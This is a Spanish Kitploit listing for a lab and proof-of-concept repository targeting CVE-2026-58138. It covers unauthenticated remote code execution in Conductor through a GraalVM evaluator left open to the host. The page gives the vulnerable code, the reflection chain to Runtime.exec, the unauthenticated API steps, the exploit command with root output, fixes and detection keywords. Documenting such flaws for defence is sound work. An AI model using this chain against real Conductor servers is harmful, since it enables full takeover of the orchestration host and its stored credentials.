Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-58138-Conductor-Unauth-RCE — CVE-2026-58138 — Conductor (3.21.21..<3.30.2) RCE no autenticado a través del evaluador INLINE de GraalVM (HostAccess.ALL). Laboratorio + PoC, verificado e2e (root). | Kitploit
Herramientas/GitHubGitHub/biitts/cve-2026-58138-conductor-unauth-rce
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubbiitts/cve-2026-58138-conductor-unauth-rce

CVE-2026-58138-Conductor-Unauth-RCE

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) RCE no autenticado a través del evaluador INLINE de GraalVM (HostAccess.ALL). Laboratorio + PoC, verificado e2e (root).

Ver Repositorio
hace 1 mesAún no revisado

CVE-2026-58138 — Conductor RCE no autenticada a través del Evaluador GraalVM INLINE

Conductor (OSS / Orkes) 3.21.21 … antes de 3.30.2 evalúa JavaScript proporcionado por el usuario en tareas INLINE (y LAMBDA / DO_WHILE / SWITCH) con un contexto de GraalVM construido con acceso completo al host (HostAccess.ALL). El script refleja hasta java.lang.Runtime y ejecuta comandos del sistema operativo. La API comunitaria no tiene autenticación por defecto, por lo que enviar un flujo de trabajo con dicha tarea es ejecución remota de código no autenticada.

Nota sobre versiones (léase). La configuración del evaluador varía dentro del rango afectado: las versiones hasta ~3.29.x (este laboratorio usa 3.22.3) construyen el contexto con allowHostAccess(HostAccess.ALL) — la configuración sin sandbox que describe el CVE, y la que este PoC explota directamente. La línea 3.30.0/3.30.1 agregó una lista negra parcial denyAccess(...) (reflexión bloqueada); la corrección completa (allowHostClassLoading(false) + endurecimiento del motor) solo llega en 3.30.2. Este PoC apunta a la configuración HostAccess.ALL simple; no afirma evitar la lista negra de 3.30.1.


Causa raíz

core/.../events/ScriptEvaluator.java (≤ 3.29.x / 3.22.3):

root@kitploit:~
return Context.newBuilder("js")
        .allowHostAccess(HostAccess.ALL)   // interop total con el host -> sin sandbox
        .build();

HostAccess.ALL permite que el script llame a cualquier método/campo en objetos Java del host. La tarea INLINE vincula su entrada como $, un objeto Java real, por lo que el script puede pivotar: $.getClass().getClass() → java.lang.Class → Class.forName("java.lang.Runtime") → Runtime.getRuntime().exec(...). El evaluador de Python es equivalente (Context.newBuilder("python").allowAllAccess(true)).

Explotación

  1. Registrar un flujo de trabajo cuya tarea INLINE lleve la expression maliciosa (POST /api/metadata/workflow, sin autenticación).
  2. Iniciarlo (POST /api/workflow/{name}, sin autenticación).
  3. La tarea INLINE evalúa el JS; el Runtime.exec reflectivo ejecuta el comando y el PoC devuelve su stdout como resultado de la tarea.

Reproducir

root@kitploit:~
docker compose -f lab/docker-compose.yml up -d        # conductoross/conductor:3.22.3 (en rango)
# esperar ~60s a que arranque el servidor todo-en-uno

python3 exploit.py http://127.0.0.1:8080 -c "id; hostname"

Observado:

root@kitploit:~
[*] registrando flujo de trabajo con una tarea INLINE (javascript) maliciosa ... (sin auth)
[*] flujo de trabajo iniciado id=...; leyendo salida de tarea INLINE ...
[+] RCE NO AUTENTICADA CONFIRMADA - salida del comando desde el host Conductor:
uid=0(root) gid=0(root) groups=0(root)
vbox
Linux 6.18.12+kali-amd64

uid=0(root) es el usuario del proceso Conductor; la salida es el estado vivo de id/uname — ejecución genuina, no eco. exploit.py solo usa la biblioteca estándar de Python.

Impacto

Cualquiera que pueda alcanzar la API de Conductor ejecuta comandos arbitrarios del SO (aquí como root) en el host orquestador — compromiso total del motor de flujos de trabajo, sus persistencia/colas, y cada sistema al que los flujos y sus credenciales almacenadas acceden.

Corrección

  • Actualizar a Conductor ≥ 3.30.2 (los evaluadores JS/Python ya no se ejecutan con acceso al host / carga de clases habilitada).
  • Defensa en profundidad: poner autenticación frente a la API de Conductor, ejecutar el servidor como un usuario no root con mínimos privilegios, y restringir quién puede registrar/ejecutar flujos.

Detección

Identificar definiciones de flujos cuyas tareas INLINE/LAMBDA/DO_WHILE/SWITCH contengan cadenas expression que referencien getClass, forName, Runtime, exec, ProcessBuilder, o reflexión java., y procesos Conductor que generen shells.

Consulte ANALYSIS.md para la cadena de reflexión, la configuración del evaluador en todas las versiones y el parche.


  • Autor: Caio Fabrício — github.com/BiiTts
  • El crédito de la vulnerabilidad pertenece al reportero original / aviso del proveedor; este repositorio es un laboratorio independiente y reproducible + PoC para uso defensivo y educativo. Solo para pruebas de seguridad autorizadas.
Descargar herramienta
CVECVE-2026-58138
Advertenciavulncheck — Orkes Conductor RCE no autenticada a través de evaluadores de script GraalVM
AfectadoConductor 3.21.21 … antes de 3.30.2
Corregido3.30.2 (commits 87a7d96, c691e35)
ClaseCWE-94 (Inyección de código) — El sandbox políglota de GraalVM no se aplicó
CVSS9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AutenticaciónNinguna (la API comunitaria no está autenticada por defecto)
EstadoCONFIRMADO — reproducido como root contra conductoross/conductor:3.22.3